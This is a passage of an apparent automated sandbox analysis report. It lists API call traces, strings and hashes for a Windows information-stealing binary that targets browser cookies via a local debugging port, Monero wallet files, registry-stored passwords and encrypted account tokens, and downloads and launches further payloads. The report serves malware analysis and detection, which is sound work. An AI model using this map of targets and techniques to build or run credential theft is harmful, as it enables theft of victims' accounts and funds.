                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB35AD
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB373A
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 4aeaf9404637ebea17ff7bbeb6fd7602c752b6b780b989b080de83534ec4ba7f
                                • Instruction ID: 5518dc7ce89b5a84b1cb09b8b2dc835de47e7955c215a6a2d2b9c879364c94db
                                • Opcode Fuzzy Hash: 4aeaf9404637ebea17ff7bbeb6fd7602c752b6b780b989b080de83534ec4ba7f
                                • Instruction Fuzzy Hash: 68120E71910118AACF18EBA0DDA2FEFB7B9AF14300F4855B9E11676191EF342B49CF61
                                APIs
                                  • Part of subcall function 00EA9A50: InternetOpenA.WININET(00EC0AF6,00000001,00000000,00000000,00000000), ref: 00EA9A6A
                                • lstrcat.KERNEL32(?,cookies), ref: 00EA9CAF
                                • lstrcat.KERNEL32(?,00EC12C4), ref: 00EA9CC1
                                • lstrcat.KERNEL32(?,?), ref: 00EA9CD5
                                • lstrcat.KERNEL32(?,00EC12C8), ref: 00EA9CE7
                                • lstrcat.KERNEL32(?,?), ref: 00EA9CFB
                                • lstrcat.KERNEL32(?,.txt), ref: 00EA9D0D
                                • lstrlen.KERNEL32(00000000), ref: 00EA9D17
                                • lstrlen.KERNEL32(00000000), ref: 00EA9D26
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Similarity
                                • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 3174675846-3542011879
                                • Opcode ID: 8d2059200e5b008cabc469b170bd97890724cbb47b107798c2f7c1997acf54b9
                                • Instruction ID: 2e1546502eeba4f4a5f281726872433ff57d0d4c0edd3b76e5292f40bad9d3ed
                                • Opcode Fuzzy Hash: 8d2059200e5b008cabc469b170bd97890724cbb47b107798c2f7c1997acf54b9
                                • Instruction Fuzzy Hash: 0951A0B5D10208ABDB14EBE0DC95FEE7778AB05301F0055A8F215BB191EF71AA89CF61
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA62D0: InternetOpenA.WININET(00EC0DFF,00000001,00000000,00000000,00000000), ref: 00EA6331
                                  • Part of subcall function 00EA62D0: StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6353
                                  • Part of subcall function 00EA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA6385
                                  • Part of subcall function 00EA62D0: HttpOpenRequestA.WININET(00000000,GET,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA63D5
                                  • Part of subcall function 00EA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EA640F
                                  • Part of subcall function 00EA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA6421
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5568
                                • lstrlen.KERNEL32(00000000), ref: 00EB557F
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00EB55B4
                                • lstrlen.KERNEL32(00000000), ref: 00EB55D3
                                • lstrlen.KERNEL32(00000000), ref: 00EB55FE
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: ddde8a4662bf9ddcfd553e0d7154a11ce23679887dc418795f9becc061be8a60
                                • Instruction ID: 409a07b50a1677f009d1c4e02515cf0173c999e521081058b7acfadc305fd273
                                • Opcode Fuzzy Hash: ddde8a4662bf9ddcfd553e0d7154a11ce23679887dc418795f9becc061be8a60
                                • Instruction Fuzzy Hash: 4A51D930A10108ABCF18FF60D9A7BEE77B9AF15340F546478E4167A592EB306B45CB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 7e2396d419d554e163d353816a1365e9204311d60181ecc14e527185196d601d
                                • Instruction ID: f62cbf6b1840e345701933592a2fedac43b2a07b45449066687df5277224f892
                                • Opcode Fuzzy Hash: 7e2396d419d554e163d353816a1365e9204311d60181ecc14e527185196d601d
                                • Instruction Fuzzy Hash: 47C195B5900219ABCF18EF60DC9AFEF73B9AF54304F0455E8E51977242DA70AA84CF91
                                APIs
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB453C
                                • lstrcat.KERNEL32(?,01BFF130), ref: 00EB455B
                                • lstrcat.KERNEL32(?,?), ref: 00EB456F
                                • lstrcat.KERNEL32(?,01BFE4B0), ref: 00EB4583
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB8F20: GetFileAttributesA.KERNEL32(00000000,?,00EA1B94,?,?,00EC577C,?,?,00EC0E22), ref: 00EB8F2F
                                  • Part of subcall function 00EAA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EAA489
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB9550: GlobalAlloc.KERNEL32(00000000,-F,00EB462D), ref: 00EB9563
                                • StrStrA.SHLWAPI(?,01BFF148), ref: 00EB4643
                                • GlobalFree.KERNEL32(?), ref: 00EB4762
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA23F
                                  • Part of subcall function 00EAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00EA4F3E,00000000,?), ref: 00EAA251
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA27A
                                  • Part of subcall function 00EAA210: LocalFree.KERNEL32(?,?,?,?,00EA4F3E,00000000,?), ref: 00EAA28F
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB46F3
                                • StrCmpCA.SHLWAPI(?,00EC08D2), ref: 00EB4710
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EB4722
                                • lstrcat.KERNEL32(00000000,?), ref: 00EB4735
                                • lstrcat.KERNEL32(00000000,00EC0FA0), ref: 00EB4744
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 25df24af2d552492579c68befaa41cfc04adf763297cd7a0671c5cde89122ccc
                                • Instruction ID: 17ec5f60523a68cbe120816c1ed1c8638c6bea1f7c6dd2e6339f2026b4ed23e4
                                • Opcode Fuzzy Hash: 25df24af2d552492579c68befaa41cfc04adf763297cd7a0671c5cde89122ccc
                                • Instruction Fuzzy Hash: 637188B6900218ABDF14EBA0DD99FDE73BDAB48300F0455A8F61566185EF34EB44CB61
                                APIs
                                  • Part of subcall function 00EA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA12B4
                                  • Part of subcall function 00EA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EA12BB
                                  • Part of subcall function 00EA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EA12D7
                                  • Part of subcall function 00EA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EA12F5
                                  • Part of subcall function 00EA12A0: RegCloseKey.ADVAPI32(?), ref: 00EA12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00EA134F
                                • lstrlen.KERNEL32(?), ref: 00EA135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00EA1377
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EA1465
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                • DeleteFileA.KERNEL32(00000000), ref: 00EA14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: c305e4e0cc97474c1e605904f0a3eb3dc7d719d9c2bb8e87d80826cf3aa0a8a0
                                • Instruction ID: d7688cf62ffc9faf4bf8febf24ee8a2f304a49906b3c0b1bde647a99dc96a01a
                                • Opcode Fuzzy Hash: c305e4e0cc97474c1e605904f0a3eb3dc7d719d9c2bb8e87d80826cf3aa0a8a0
                                • Instruction Fuzzy Hash: 1D5121B19502186BCF15EB60DD96FEE73BC9B54300F4455F8B60A72091EE306B89CFA6
                                APIs
                                • InternetOpenA.WININET(00EC0AF6,00000001,00000000,00000000,00000000), ref: 00EA9A6A
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00EA9AAB
                                • InternetCloseHandle.WININET(00000000), ref: 00EA9AC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$Open$CloseHandle
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 3289985339-2144369209
                                • Opcode ID: 1791941eb94915dd58c95cf2ff15324b2b72491a4b41d9d01a5ae611552f2853
                                • Instruction ID: 7419a2316f858bff773dc0ef892afaa6ae88cab6844a1b28114e5585c057d2d6
                                • Opcode Fuzzy Hash: 1791941eb94915dd58c95cf2ff15324b2b72491a4b41d9d01a5ae611552f2853
                                • Instruction Fuzzy Hash: 1F413B35A10218EBDB14EBA4DD95FDEB7B8AB48740F105198F509BA191CBB1BE80CF64
                                APIs
                                  • Part of subcall function 00EA7330: memset.MSVCRT ref: 00EA7374
                                  • Part of subcall function 00EA7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EA739A
                                  • Part of subcall function 00EA7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EA7411
                                  • Part of subcall function 00EA7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EA746D
                                  • Part of subcall function 00EA7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00EA74B2
                                  • Part of subcall function 00EA7330: HeapFree.KERNEL32(00000000), ref: 00EA74B9
                                • lstrcat.KERNEL32(00000000,00EC192C), ref: 00EA7666
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EA76A8
                                • lstrcat.KERNEL32(00000000, : ), ref: 00EA76BA
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EA76EF
                                • lstrcat.KERNEL32(00000000,00EC1934), ref: 00EA7700
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EA7733
                                • lstrcat.KERNEL32(00000000,00EC1938), ref: 00EA774D
                                • task.LIBCPMTD ref: 00EA775B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: 14acaef584f94fec420491dfeca994e60b057f2e0a21fd174ef16743055014ca
                                • Instruction ID: aedff3ae57ab4cd8f8f2387da59fd9aa90162c3525c2dedf1601e5ca4d5fc143
                                • Opcode Fuzzy Hash: 14acaef584f94fec420491dfeca994e60b057f2e0a21fd174ef16743055014ca
                                • Instruction Fuzzy Hash: 69316F75D00104DBDB18DBA0DD99DEEB3B8AB5A301F105128F122B7395CF34A986CB90
                                APIs
                                • memset.MSVCRT ref: 00EA7374
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EA739A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EA7411
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EA746D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EA74B2
                                • HeapFree.KERNEL32(00000000), ref: 00EA74B9
                                • task.LIBCPMTD ref: 00EA75B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                APIs
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                • wsprintfA.USER32 ref: 00EA9E7F
                                • memset.MSVCRT ref: 00EA9EED
                                • lstrcat.KERNEL32(00000000,?), ref: 00EA9F03
                                • lstrcat.KERNEL32(00000000,?), ref: 00EA9F17
                                • lstrcat.KERNEL32(00000000,00EC12D8), ref: 00EA9F29
                                • lstrcpy.KERNEL32(?,00000000), ref: 00EA9F7C
                                • memset.MSVCRT ref: 00EA9F9C
                                • Sleep.KERNEL32(00001388), ref: 00EAA013
                                  • Part of subcall function 00EB99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB99C5
                                  • Part of subcall function 00EB99A0: Process32First.KERNEL32(00EAA056,00000128), ref: 00EB99D9
                                  • Part of subcall function 00EB99A0: Process32Next.KERNEL32(00EAA056,00000128), ref: 00EB99F2
                                  • Part of subcall function 00EB99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB9A4E
                                  • Part of subcall function 00EB99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB9A6C
                                  • Part of subcall function 00EB99A0: CloseHandle.KERNEL32(00000000), ref: 00EB9A79
                                  • Part of subcall function 00EB99A0: CloseHandle.KERNEL32(00EAA056), ref: 00EB9A88
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                • String ID: D
                                • API String ID: 3242155833-2746444292
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                • InternetOpenA.WININET(00EC0DFB,00000001,00000000,00000000,00000000), ref: 00EA615F
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6197
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EA61DF
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EA6203
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00EA622C
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EA625A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00EA6299
                                • InternetCloseHandle.WININET(?), ref: 00EA62A3
                                • InternetCloseHandle.WININET(00000000), ref: 00EA62B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                APIs
                                • type_info::operator==.LIBVCRUNTIME ref: 00F2024D
                                • ___TypeMatch.LIBVCRUNTIME ref: 00F2035B
                                • CatchIt.LIBVCRUNTIME ref: 00F203AC
                                • CallUnexpected.LIBVCRUNTIME ref: 00F204C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                • String ID: csm$csm$csm
                                • API String ID: 2356445960-393685449
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB78C4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB78CB
                                • RegOpenKeyExA.ADVAPI32(80000002,01BECE80,00000000,00020119,Ix), ref: 00EB78EB
                                • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EB790A
                                • RegCloseKey.ADVAPI32(Ix), ref: 00EB7914
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber$Ix
                                • API String ID: 3225020163-4041952297
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • lstrlen.KERNEL32(00000000), ref: 00EABC6F
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00EABC9D
                                • lstrlen.KERNEL32(00000000), ref: 00EABD75
                                • lstrlen.KERNEL32(00000000), ref: 00EABD89
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00EB08DC,C:\ProgramData\chrome.dll), ref: 00EB9871
                                  • Part of subcall function 00EAA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00EAA098
                                • StrCmpCA.SHLWAPI(00000000,01BFA048), ref: 00EB0922
                                • StrCmpCA.SHLWAPI(00000000,01BF9F48), ref: 00EB0B79
                                • StrCmpCA.SHLWAPI(00000000,01BF9F68), ref: 00EB0A0C
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00EB0C35
                                Strings
                                • C:\ProgramData\chrome.dll, xrefs: 00EB0C30
                                • C:\ProgramData\chrome.dll, xrefs: 00EB08CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                • API String ID: 585553867-663540502
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 00F1FA1F
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00F1FA27
                                • _ValidateLocalCookies.LIBCMT ref: 00F1FAB0
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00F1FADB
                                • _ValidateLocalCookies.LIBCMT ref: 00F1FB30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                • Instruction ID: f218ed2d84e0af8985aab4d01119523c09fcd33306f1fbe9517170843e45e505
                                • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                • Instruction Fuzzy Hash: 6541B331D00219EFCF10DF68CC84ADE7BB5BF49324F148165E818AB392D7399989DB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EA501A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA5021
                                • InternetOpenA.WININET(00EC0DE3,00000000,00000000,00000000,00000000), ref: 00EA503A
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EA5061
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EA5091
                                • InternetCloseHandle.WININET(?), ref: 00EA5109
                                • InternetCloseHandle.WININET(?), ref: 00EA5116
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
